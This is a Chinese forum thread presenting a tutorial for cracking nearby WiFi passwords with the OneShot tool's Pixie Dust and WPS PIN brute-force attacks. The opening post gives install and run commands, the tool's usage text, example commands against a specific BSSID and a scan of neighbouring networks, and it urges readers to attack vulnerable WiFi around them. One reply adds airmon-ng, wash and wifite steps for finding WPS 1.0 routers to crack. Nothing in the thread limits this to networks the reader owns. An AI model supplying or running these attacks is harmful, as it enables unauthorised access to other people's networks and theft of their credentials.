ubnt解决方案
查看: 5080|回复: 30

仙尘PIN秒破WiFi教学

[复制链接]

40

回帖

1220

积分

434 小时

在线时间

上尉

注册时间
2022-9-3
金币
1112 个
威望
2 个
荣誉
0 个
累计签到:5 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2023-8-2 15:09 |显示全部楼层
概述
OneShot执行Pixie Dust攻击,而无需切换到监控模式。
特征要求设置Debian/Ubuntu/kali
安装依赖
sudo apt install -y python3 wpasupplicant iw wget




安装小精灵
Ubuntu 18.04 及更高版本或 Debian 10 及更高版本
sudo apt install -y pixiewps




获取OneShot
git clone --depth 1 https://github.com/drygdryg/OneShot OneShot




运行
sudo python OneShot/oneshot.py -i wlan0 --iface-down -K




用法

oneshot.py <arguments>
Required arguments:
     -i, --interface=<wlan0>  : Name of the interface to use

Optional arguments:
     -b, --bssid=<mac>        : BSSID of the target AP
     -p, --pin=<wps pin>      : Use the specified pin (arbitrary string or 4/8 digit pin)
     -K, --pixie-dust         : Run Pixie Dust attack
     -B, --bruteforce         : Run online bruteforce attack
     --push-button-connect    : Run WPS push button connection

Advanced arguments:
     -d, --delay=<n>          : Set the delay between pin attempts [0]
     -w, --write              : Write AP credentials to the file on success
     -F, --pixie-force        : Run Pixiewps with --force option (bruteforce full range)
     -X, --show-pixie-cmd     : Alway print Pixiewps command
     --vuln-list=<filename>   : Use custom file with vulnerable devices list ['vulnwsc.txt']
     --iface-down             : Down network interface when the work is finished
     -l, --loop               : Run in a loop
     -r, --reverse-scan       : Reverse order of networks in the list of networks. Useful on small displays
     --mtk-wifi               : Activate MediaTek Wi-Fi interface driver on startup and deactivate it on exit
                                (for internal Wi-Fi adapters implemented in MediaTek SoCs). Turn off Wi-Fi in the system settings before using this.
     -v, --verbose            : Verbose output




使用示例
在指定的BSSID上启动小精灵尘埃攻击:
sudo python3 oneshot.py -i wlan0 -b 00:90:4C:C1:AC:21 -K




显示可用网络并在指定网络上启动 Pixie Dust 攻击:
sudo python3 oneshot.py -i wlan0 -K




使用指定的PIN的前半部分启动在线WPS暴力破解:
sudo python3 oneshot.py -i wlan0 -b 00:90:4C:C1:AC:21 -B -p 1234




启动WPS按钮连接:s
sudo python3 oneshot.py -i wlan0 --pbc




使用效果

# 执行仙尘攻击
╰─ sudo python oneshot.py -i wlan0 --iface-down -K
  • Running wpa_supplicant…
  • BSSID not specified (--bssid) — scanning for available networks
    Network marks: Possibly vulnerable | WPS locked | Already stored
    Networks list:
    #    BSSID              ESSID                     Sec.     PWR  WSC device name             WSC model
    1)   4A:F8:FF:73:7F:89                            WPA2     -76                              
    2)   58:BE:72:1C:0F:A8  CU_S5wj                   WPA/WPA2 -76                              
    3)   48:F8:FF:53:7F:89  CMCC-9cmM                 WPA2     -80  RalinkAPS_0                 Ralink Wireless Access Point RT2860
    4)   4A:F8:FF:33:7F:89  CMCC-QLINK                Open     -82                              
    5)   E87:65:B2:8C:1C  CU_Fe63_5G                WPA/WPA2 -83  huawei_ONT                  WAP 123
    6)   94:F8:27:7A:EC:92  ChinaNet-EC8E             WPA/WPA2 -84                              
    7)   14:89:CB:16:B2:A4  CU_Fe63_5G                WPA/WPA2 -84  huawei_ONT                  WAP 123
    8)   70:423:56:40:92  CMCC-ppSG                 WPA2     -86                              
    9)   4A:F8:FF:13:7F:89  CMCC-GUIDE-LINK           WPA2     -87  RalinkAPS_1                 Ralink Wireless Access Point RT2860




    破解一个WiFi只需要0.89秒,如果你周围存在这种易受攻击的WiFi,试试仙尘攻击吧!!!!!
    绿色表示易受攻击
    选择目标9,回车

    破解完毕,wpa-psk为密码,wps-pin为PIN码!!!

  • 本帖子中包含更多资源

    您需要 登录 才可以下载或查看,没有账号?注册 微信登录

    x
    QQ:1725099638

    290

    回帖

    1868

    积分

    1364 小时

    在线时间

    上尉

    注册时间
    2013-3-19
    金币
    1354 个
    威望
    17 个
    荣誉
    0 个
    累计签到:107 天
    连续签到:1 天
    [LV.200]无线新星
    发表于 2023-8-12 14:16 |显示全部楼层
    本帖最后由 xun73tian 于 2023-8-12 14:34 编辑
    vanke 发表于 2023-8-12 09:58
    怎么用的 命令怎么用  我是直接输入命令wifite 让他自动的pin不出来

    有的能出,有的不能出。对方路由器的wps为1.0版本的,几乎都能获取到pin码。wps为2.0版本的很难,并且有上锁功能。

    使用wifite时,先扫描一下wps版本。
    systemctl stop NetworkManager (关闭网络管理功能)
    airmon-ng check kill
    wash -i wlan0    (简便扫描开启wps的AP)
    记住1.0版本wps的路由器
    wifite -i wlan0  (使用wifite扫描wps功能的路由器)
    选择1.0版本的路由器进行pin码尝试。






    本帖子中包含更多资源

    您需要 登录 才可以下载或查看,没有账号?注册 微信登录

    x
    回复

    使用道具 举报

    151

    回帖

    1239

    积分

    224 小时

    在线时间

    上尉

    注册时间
    2010-12-8
    金币
    1065 个
    威望
    0 个
    荣誉
    0 个
    累计签到:87 天
    连续签到:0 天
    [LV.100]试剑无线
    发表于 2023-8-3 00:24 |显示全部楼层
    看不懂
    回复

    使用道具 举报

    135

    回帖

    4000

    积分

    976 小时

    在线时间

    少校

    注册时间
    2012-10-28
    金币
    3751 个
    威望
    0 个
    荣誉
    0 个
    累计签到:1344 天
    连续签到:1 天
    [LV.1825]无线元老
    发表于 2023-8-3 09:57 |显示全部楼层
    能简单一点吗?有没有教学视频?
    回复

    使用道具 举报

    387

    回帖

    1万

    积分

    981 小时

    在线时间

    上校

    优秀会员30天持久勋章

    注册时间
    2011-3-7
    金币
    10554 个
    威望
    16 个
    荣誉
    5 个
    累计签到:868 天
    连续签到:15 天
    [LV.1095]铁杆粉丝
    发表于 2023-8-3 11:40 |显示全部楼层
    这还是用以前的PIN方式; 好像没变
    回复

    使用道具 举报

    1452

    回帖

    2万

    积分

    2134 小时

    在线时间

    大校

    灌水天才推广先锋

    注册时间
    2014-2-14
    金币
    25408 个
    威望
    163 个
    荣誉
    1 个
    累计签到:1284 天
    连续签到:1 天
    [LV.1825]无线元老
    发表于 2023-8-3 12:51 |显示全部楼层
    本帖最后由 东西方不败 于 2023-8-3 12:52 编辑

    试试看
    随时随地无线。
    回复

    使用道具 举报

    176

    回帖

    3万

    积分

    939 小时

    在线时间

    大校

    30天持久勋章

    注册时间
    2008-6-21
    金币
    36962 个
    威望
    6 个
    荣誉
    0 个
    累计签到:3231 天
    连续签到:31 天
    [LV.3650]以坛为家
    发表于 2023-8-3 19:18 来自手机 |显示全部楼层
    好像很厉害,可惜不会
    回复

    使用道具 举报

    1452

    回帖

    2万

    积分

    2134 小时

    在线时间

    大校

    灌水天才推广先锋

    注册时间
    2014-2-14
    金币
    25408 个
    威望
    163 个
    荣誉
    1 个
    累计签到:1284 天
    连续签到:1 天
    [LV.1825]无线元老
    发表于 2023-8-3 19:48 |显示全部楼层
    试过了 周边的无线都不支持   只有少数路由器wifi芯片才能用这个方式破解
    随时随地无线。
    回复

    使用道具 举报

    202

    回帖

    2656

    积分

    669 小时

    在线时间

    少校

    注册时间
    2019-7-18
    金币
    2387 个
    威望
    0 个
    荣誉
    0 个
    累计签到:5 天
    连续签到:0 天
    [LV.20]漫游旅程
    发表于 2023-8-7 12:48 |显示全部楼层
    那种300s防pin的咋pin?
    回复

    使用道具 举报

    40

    回帖

    1220

    积分

    434 小时

    在线时间

    上尉

    注册时间
    2022-9-3
    金币
    1112 个
    威望
    2 个
    荣誉
    0 个
    累计签到:5 天
    连续签到:0 天
    [LV.20]漫游旅程
    发表于 2023-8-7 18:55 |显示全部楼层

    是的,那将可以。但你必须跳由我指定的特殊舞蹈
    QQ:1725099638
    回复

    使用道具 举报

    526

    回帖

    1871

    积分

    283 小时

    在线时间

    上尉

    注册时间
    2015-1-28
    金币
    1275 个
    威望
    2 个
    荣誉
    0 个
    累计签到:45 天
    连续签到:0 天
    [LV.50]初入江湖
    发表于 2023-8-7 19:47 |显示全部楼层
    看不懂啊是
    回复

    使用道具 举报

    290

    回帖

    1868

    积分

    1364 小时

    在线时间

    上尉

    注册时间
    2013-3-19
    金币
    1354 个
    威望
    17 个
    荣誉
    0 个
    累计签到:107 天
    连续签到:1 天
    [LV.200]无线新星
    发表于 2023-8-7 23:44 |显示全部楼层
    实验了一下,没有wifite2-2.5.8-b好用!wifite2-2.5.8-b能出pin码的,小精灵尘埃出不了!
    回复

    使用道具 举报

    3

    回帖

    21

    积分

    15 小时

    在线时间

    新兵上阵

    注册时间
    2022-8-24
    金币
    16 个
    威望
    0 个
    荣誉
    0 个
    累计签到:6 天
    连续签到:0 天
    [LV.20]漫游旅程
    发表于 2023-8-10 18:11 |显示全部楼层
    克隆出错了
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册 微信登录

    本版积分规则

    站点统计 | Archiver | 手机版 | 无线门户 ( 粤ICP备11076993号|粤公网安备44010602008359号 ) |网站地图

    GMT+8, 2024-12-20 00:11

    返回顶部 返回列表